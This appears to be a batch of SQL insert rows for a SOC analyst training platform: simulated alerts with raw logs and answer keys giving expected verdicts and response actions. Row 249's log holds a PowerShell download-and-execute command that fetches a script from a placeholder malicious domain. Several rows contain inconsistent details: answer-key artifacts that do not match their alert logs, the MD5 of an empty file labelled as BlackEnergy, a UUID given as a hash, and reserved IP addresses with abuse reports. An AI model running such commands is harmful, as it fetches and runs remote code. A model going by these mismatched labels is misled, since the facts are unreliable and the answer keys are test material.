(246, 'Phishing Attempt Detected - Malicious Email Link', 'medium', 'Proofpoint', 'A phishing email was received containing a malicious link attempting to harvest credentials. The sender\'s domain is known for phishing activities.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2023-10-05T09:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.10\",\"email_sender\":\"phisher@example.com\",\"url\":\"http://malicious-site.com/login\",\"username\":\"asmith\"}', '2025-12-28 12:31:27', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Domain frequently used in phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Site flagged for credential phishing\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with spam and phishing\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Both the sender\'s email and the URL are flagged as malicious, confirming a phishing attempt.\"}', 'Beginner', 'SIEM', 1, 0, 'GOVERNMENT'),
(247, 'Brute Force Attack Detected - Multiple Failed Logins', 'critical', 'Wazuh', 'Multiple failed login attempts detected, indicating a possible brute force attack. The source IP is from a foreign country with a history of attacks.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-05T17:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.1.10\",\"username\":\"administrator\",\"failed_attempts\":45}', '2025-12-28 11:20:25', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"Shodan\",\"verdict\":\"malicious\",\"details\":\"IP known for brute force attack attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted by brute force\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed attempts from a malicious IP confirms a brute force attack.\"}', 'Advanced', 'SIEM', 1, 0, 'OT_ICS'),
(248, 'Suspicious Network Traffic - False Positive', 'low', 'Firewall', 'Network traffic was detected from a known cloud provider IP, initially flagged as suspicious. Further investigation reveals it to be legitimate.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2023-10-05T11:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.120\",\"dst_ip\":\"192.168.1.50\",\"username\":\"n/a\",\"hostname\":\"SERVER-1\"}', '2025-12-28 01:16:06', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPInfo\",\"verdict\":\"clean\",\"details\":\"IP belongs to a reputable cloud service provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a legitimate server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The source IP is from a legitimate cloud provider, reducing the likelihood of malicious intent.\"}', 'Beginner', 'NDR', 1, 0, 'TECH'),
(249, 'Suspicious PowerShell Command Execution Detected', 'high', 'endpoint', 'A suspicious PowerShell command that could potentially allow remote code execution or credential dumping was detected on an endpoint.', 'Execution', 'T1086', 1, 'investigating', 54, '{\"log_type\":\"process_creation\",\"timestamp\":\"2023-10-12T14:22:09Z\",\"hostname\":\"Corporate-Laptop-04\",\"username\":\"jdoe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -nop -c \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\\"\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":4821,\"process_id\":9342,\"integrity_level\":\"High\",\"network_activity\":[{\"protocol\":\"HTTP\",\"dest_ip\":\"192.168.1.105\",\"dest_port\":80,\"url\":\"http://maliciousdomain.com/script.ps1\"}]}', '2025-12-28 05:40:53', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"253.135.96.33\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'NULL', 1, 0, NULL),
(250, 'Suspicious PowerShell Command Execution Detected', 'medium', 'process', 'A PowerShell script was executed with encoded commands which is commonly used to obfuscate malicious scripts.', 'Behavioral Anomaly', 'T1086', 1, 'Closed', 48, '{\"timestamp\":\"2023-10-23T14:25:36Z\",\"host_name\":\"HR-DESKTOP-07\",\"user_name\":\"j.smith\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBy\\nYW5kb20gdGV4dF0NCmVjaG8gIlRoaXMgaXMgYSB0ZXN0LiI=\",\"file_hash\":\"3fa4cd6c63168b1eae1f3116ce3f789a175c3abe\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":3452,\"process_id\":6784,\"integrity_level\":\"High\",\"src_ip\":\"192.168.10.23\",\"geo_location\":\"\",\"event_id\":4688,\"logon_type\":2}', '2025-12-28 05:25:32', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"61.243.64.122\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 61.243.64.122 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User accessed from known location during normal business hours. Activity consistent with role.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NULL', 1, 0, NULL),
(251, 'Suspicious Network Activity Detected: Potential Data Exfiltration', 'high', 'network', 'Unusual outbound network activity detected, with large volumes of data being transferred to an unknown external IP address over an atypical port.', 'data_exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'New', NULL, '{\"timestamp\":\"2023-11-01T14:23:45Z\",\"src_ip\":\"192.168.1.10\",\"dest_ip\":\"203.0.113.54\",\"src_port\":49876,\"dest_port\":8080,\"protocol\":\"TCP\",\"bytes_sent\":87000000,\"bytes_received\":1240,\"session_duration_sec\":3600,\"flags\":\"SYN,ACK\",\"geoip\":{\"country\":\"Unknown\",\"city\":\"Unknown\"},\"user_agent\":\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\",\"anomalies\":[\"Unusual port communication\",\"High data transfer volume\"],\"event_id\":\"net-20231101-42345\"}', '2025-12-28 05:42:26', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"237.158.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 237.158.1.45 reported 452 times for malicious activity. Abuse confidence score: 86%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'),
(252, 'Successful Login with Previously Compromised Credentials', 'high', 'Authentication Logs', 'An unauthorized login attempt was detected and successfully executed using credentials associated with a known compromised email. This alert aligns with an attack pattern observed in the Acme Corp breach of August 2023, where attackers used publicly available credentials to infiltrate user accounts.', 'Credential Access', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2023-10-11T13:45:23Z\",\"event_source\":\"Authentication Logs\",\"event_id\":\"401\",\"username\":\"j.doe@examplecorp.com\",\"ip_address\":\"192.0.2.123\",\"location\":\"Toronto, Canada\",\"login_status\":\"Success\",\"authentication_method\":\"Password\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\",\"previous_compromise\":\"yes\",\"related_event_ids\":[\"ACME-20230815-0423\"],\"risk_score\":85,\"request_id\":\"req-123456789\"}', '2025-12-28 05:00:05', '2026-01-11 01:09:19', NULL, 'Intermediate', 'SIEM', 1, 0, 'GOVERNMENT'),
(253, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A PowerShell script was executed on a host, which is often used by attackers to download and execute malware. Analysis revealed the script attempted to communicate with a known malicious server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"file_hash\":\"abc123def456ghi789jkl012mno345pq\",\"domain\":\"malicious-example.com\"}', '2025-12-28 17:13:32', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abc123def456ghi789jkl012mno345pq\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in 12 AV engines detecting it as a trojan\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell execution with outbound connection to a known malicious IP indicates a malware attempt.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
(254, 'Credential Phishing Attempt via Email', 'critical', 'Proofpoint', 'An email was received from a spoofed domain attempting to trick users into providing credentials by clicking a malicious link.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2023-10-02T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.55\",\"username\":\"asmith\",\"hostname\":\"MAILSERVER\",\"email_sender\":\"no-reply@secure-login.com\",\"url\":\"http://malicious-link.com/login\"}', '2025-12-28 17:13:32', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the email recipient\'s server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email with a known phishing URL and spoofed sender suggests a credential phishing attempt.\"}', 'Advanced', 'SIEM', 1, 0, 'OT_ICS'),
(255, 'Unauthorized Database Access Detected', 'high', 'database', 'Suspicious access detected on the corporate database outside of normal hours from an unrecognized IP address.', 'Anomaly Detection', 'T1078: Valid Accounts', 1, 'investigating', 54, '{\"timestamp\":\"2023-10-13T02:17:36Z\",\"event_type\":\"DB_access\",\"user\":\"jdoe\",\"access_time\":\"2023-10-13T02:16:45Z\",\"database\":\"CustomerData\",\"action\":\"SELECT\",\"affected_tables\":[\"customers\",\"orders\"],\"source_ip\":\"192.168.32.201\",\"dest_ip\":\"10.0.0.15\",\"login_status\":\"success\",\"access_method\":\"remote\",\"anomalous_activity\":true,\"notes\":\"Access outside of normal working hours (9am-6pm) by user accessing database for the first time.\"}', '2025-12-29 05:48:29', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"216.32.48.90\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'NULL', 1, 0, NULL),
(256, 'Suspicious Email Link Detected', 'medium', 'Email Gateway', 'An email containing a potentially harmful link was detected. The link is known to redirect users to phishing sites previously associated with credential harvesting campaigns.', 'Phishing Attempt', 'T1566.001', 1, 'Closed', 54, '{\"timestamp\":\"2023-10-15T08:54:23Z\",\"email_id\":\"ae56d7f3-8496-439b-9077-41795bdee04b\",\"source_email\":\"alerts@banking-security.com\",\"destination_email\":\"johndoe@example.com\",\"subject\":\"Important: Account Verification Needed\",\"link\":\"http://secure-account-login.com/verify\",\"link_status\":\"Blacklisted\",\"detection_method\":\"URL Reputation Check\",\"actions_taken\":\"Email Quarantine\",\"headers\":{\"Received\":\"by mailserver.example.com with SMTP id abc123456 for johndoe@example.com\",\"From\":\"<alerts@banking-security.com>\",\"To\":\"<johndoe@example.com>\",\"Subject\":\"Important: Account Verification Needed\",\"Date\":\"15 Oct 2023 08:54:21 +0000\"},\"body\":\"Dear customer, your account requires verification. Click the link to secure your account: http://secure-account-login.com/verify\"}', '2025-12-29 05:31:26', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"security@secure-google.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Sender domain is 3 days old and associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"secure-google.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"53/94 security vendors flagged this domain as malicious.\"}}],\"expected_actions\":[\"block_sender\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\"}', 'Beginner', 'NULL', 1, 0, NULL),
(257, 'Suspicious PowerShell Script Execution Detected', 'medium', 'process', 'A PowerShell script was executed which is commonly used in fileless malware attacks. The script attempted network communication with a known malicious IP.', 'Malicious Script Execution', 'T1059.001', 1, 'Closed', 54, '{\"timestamp\":\"2023-10-24T15:45:32Z\",\"event_id\":\"4674\",\"hostname\":\"DESKTOP-WX321\",\"username\":\"JohnDoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"cmdline\":\"powershell -NoProfile -ExecutionPolicy Bypass -File \\\"C:\\\\Users\\\\JohnDoe\\\\AppData\\\\Local\\\\Temp\\\\script.ps1\\\"\",\"file_hash\":\"3efd49ddfee84548bede1e13c4433b29f1db3f1d9b7f95c42e0b5cda1844afb0\",\"network_communication\":{\"src_ip\":\"192.168.1.10\",\"dest_ip\":\"203.0.113.45\",\"dest_port\":443,\"protocol\":\"HTTPS\"},\"detection_engine\":\"Signature-based\",\"signature_id\":\"POWERSHELL-0012\",\"additional_info\":\"The destination IP is associated with known C2 servers.\"}', '2025-12-29 05:44:17', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"56.201.107.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 56.201.107.90 reported 310 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NULL', 1, 0, NULL),
(259, 'Suspicious PowerShell Execution Detected on Internal Host', 'high', 'CrowdStrike', 'A PowerShell script with obfuscated content was executed on an internal host. The script was used to download and execute a known malicious payload.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-11-01T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"CORP-WKS-0123\",\"file_hash\":\"3b1f2e1a2f8b9f7c6d4e5b3a2c5d6e7f\",\"domain\":\"malicious-example.com\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -EncodedCommand YABhAHMAaAAgAC0AZQAgACcAMwBiADEAZgAyAGUAMQBhADIAZgA4AGIAOQBmADcAYwA2AGQANABlADUAYgAzAGEAMgBjADUAZABlADcAZgAnAA==\"}', '2025-12-30 01:27:50', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address associated with host CORP-WKS-0123.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malicious content.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b1f2e1a2f8b9f7c6d4e5b3a2c5d6e7f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware samples.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain involved in distributing malware.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of obfuscated PowerShell commands, a malicious file hash, and connections to a known malicious IP and domain confirm this as a malware attack.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'),
(268, 'Phishing Email Detected', 'medium', 'Email Gateway', 'Employees report suspicious emails that appear to be from a trusted partner. Analysis of the email gateway logs reveals a phishing attempt with malicious attachments disguised as urgent documents.', 'Phishing', 'T1566.001', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-08T14:23:45Z\",\"email_id\":\"abc123@example.com\",\"from\":\"partner.support@trustedpartner.com\",\"to\":\"employee@corporate.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"urgent_document.pdf\",\"attachment_hash\":\"3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.45\"}', '2025-12-31 13:10:04', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"abc123@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Gateway Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual email activity detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware detected in attachment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(269, 'BlackEnergy Malware Execution', 'high', 'EDR', 'After a user opens the malicious attachment, BlackEnergy malware is executed, providing the attackers with a foothold in the network. Endpoint Detection and Response (EDR) alerts on suspicious process activity linked to known malware signatures.', 'Malware', 'T1203: Exploitation for Client Execution', 1, 'Closed', 34, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"987654321\",\"hostname\":\"CORP-ENDPOINT-23\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"malware_name\":\"BlackEnergy\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\invoice.doc\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_name\":\"word.exe\",\"process_id\":4321,\"alert_signature\":\"BlackEnergy Malware Execution\"}', '2025-12-31 13:10:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with BlackEnergy campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known BlackEnergy malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(270, 'Persistence Mechanism Established', 'high', 'EDR', 'The attackers have used BlackEnergy malware to establish persistence on the target system. This was achieved through registry modifications and the creation of scheduled tasks, which were detected as anomalies in system configurations by the EDR.', 'Persistence', 'T1053: Scheduled Task/Job, T1112: Modify Registry', 1, 'new', 34, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"persistence\",\"host_ip\":\"10.0.1.15\",\"external_ip\":\"203.0.113.45\",\"process_name\":\"schtasks.exe\",\"user\":\"compromised_user\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\BlackEnergy\",\"scheduled_task\":\"BlackEnergy Task\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\"}', '2025-12-31 13:10:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_check\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known BlackEnergy variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"File associated with unauthorized persistence mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_audit\",\"verdict\":\"suspicious\",\"details\":\"User account used in unauthorized actions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(271, 'Lateral Movement to OT Network', 'high', 'Network Monitoring Solution', 'Network monitoring solutions detect unusual lateral movement between the IT and OT networks, indicating the attackers are attempting to access the SCADA systems controlling the power grid. A suspicious connection attempt from an internal IT network to the OT network was observed using a compromised user account.', 'Lateral Movement', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"event_type\":\"connection_attempt\",\"protocol\":\"SMB\",\"file_accessed\":\"\\\\\\\\OT-SERVER\\\\SCADA\\\\config.dat\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"external_attacker_ip\":\"203.0.113.55\",\"connection_status\":\"failed\",\"reason\":\"Unauthorized access attempt detected\"}', '2025-12-31 13:10:04', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address from IT network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address from OT network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised user account attempting lateral movement\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with credential dumping tool\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous cyber attacks targeting critical infrastructure\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
